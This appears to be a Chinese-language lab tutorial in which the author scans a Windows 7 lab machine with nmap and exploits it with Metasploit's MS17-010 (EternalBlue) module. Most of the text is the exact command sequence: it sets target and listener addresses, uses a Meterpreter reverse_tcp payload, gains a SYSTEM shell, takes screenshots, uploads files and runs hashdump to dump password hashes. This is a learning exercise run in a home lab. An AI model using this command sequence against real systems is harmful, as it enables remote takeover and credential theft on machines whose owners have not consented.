nmap扫描和MS17-010(永恒之蓝)漏洞攻击

情况介绍

攻击机kali中使用ifconfig可以看到ip是192.168.0.106
nmap扫描和MS17-010(永恒之蓝)漏洞攻击_第1张图片

靶机Window 7使用ipconfig可以看到ip192.168.0.100
nmap扫描和MS17-010(永恒之蓝)漏洞攻击_第2张图片

Nmap

Nmap全称为Network Mapper,又成为“上帝之眼”,可以扫描ip和端口。

然后在kali攻击机上使用nmap 192.168.0.103可以看一下靶机里边开放的端口和对应服务。
nmap扫描和MS17-010(永恒之蓝)漏洞攻击_第3张图片

Metasploit

sudo su - root把权限提高至root(最高权限)。
在这里插入图片描述

msfconsole进入到命令里边。
nmap扫描和MS17-010(永恒之蓝)漏洞攻击_第4张图片

search MS17-010搜索漏洞脚本。
nmap扫描和MS17-010(永恒之蓝)漏洞攻击_第5张图片

use 0选择攻击脚本。
set rhost 192.168.0.100设置靶机ip192.168.0.100
set lhost 192.168.0.106设置攻击地址为192.168.0.106
set payload windows/x64/meterpreter/reverse_tcp设置攻击脚本。
run进行执行。
nmap扫描和MS17-010(永恒之蓝)漏洞攻击_第6张图片

getuid看一下登录到Window 7上边的权限。
在这里插入图片描述

shell进入到Windows 7命令行里边。
nmap扫描和MS17-010(永恒之蓝)漏洞攻击_第7张图片

ipconfig查看Windows 7ip
nmap扫描和MS17-010(永恒之蓝)漏洞攻击_第8张图片

可以看到有许多乱码,使用chcp 65001修改编码,再次使用ipconfig查看Windows 7ip就发现乱码基本上没有了。
nmap扫描和MS17-010(永恒之蓝)漏洞攻击_第9张图片

whoami可以看到当前用户是system
在这里插入图片描述

按下Ctrl+c,然后输入y退出去Window 7命令行。
在这里插入图片描述

screenshot截了一张图。
在这里插入图片描述

截图打开如下:
nmap扫描和MS17-010(永恒之蓝)漏洞攻击_第10张图片

vim good.txttest upload写进去。
nmap扫描和MS17-010(永恒之蓝)漏洞攻击_第11张图片

upload /root/good.txt c:\\good.txt把攻击机kali中/root/good.txt发送到靶机Window 7c:\\good.txt
在这里插入图片描述

在靶机Window 7中打开c:\\good.txt
nmap扫描和MS17-010(永恒之蓝)漏洞攻击_第12张图片

hashdump可以看一下用户信息。
nmap扫描和MS17-010(永恒之蓝)漏洞攻击_第13张图片

可以在搜索引擎里边搜索meterpreter命令,看看其他命令。

我的微信号也是zhaoseaside,欢迎大家加我,提供实验镜像。

你可能感兴趣的:(网络安全学习,网络安全)